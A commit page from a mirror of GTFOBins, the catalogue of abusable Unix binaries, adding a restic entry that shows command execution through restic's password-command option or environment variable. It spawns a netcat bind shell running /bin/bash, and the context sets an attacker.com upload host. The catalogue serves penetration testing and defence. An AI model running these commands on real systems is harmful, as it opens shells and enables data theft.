public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-09-19 22:59:19 +02:00
Code Issues Projects Releases Wiki Activity

Add restic command

Browse Source 
Signed-off-by: Juju <julien.clement@epita.fr>
This commit is contained in:
Juju
2024-05-14 11:53:39 +02:00
parent 97f46f1526
commit dddc642f6f
1 changed files with 5 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
_gtfobins/restic.md
View File

@@ -17,6 +17,11 @@ description: |
Upload data to the attacker server with the following commands.
functions:
command:
- description: The attacker does not need to setup a server to receive the backups in this case. Command execution can be achieved through control of argv or environment, many restic subcommands support this option, so even if the attacker control only a subset of argv, command execution may still be achievable.
code: |
RESTIC_PASSWORD_COMMAND='nc -l 127.0.0.1 -p 4321 -e /bin/bash' restic backup # Through environment
restic backup --password-command="nc -l 127.0.0.1 -p 4321 -e /bin/bash" # Through option
file-upload:
- code: |
RHOST=attacker.com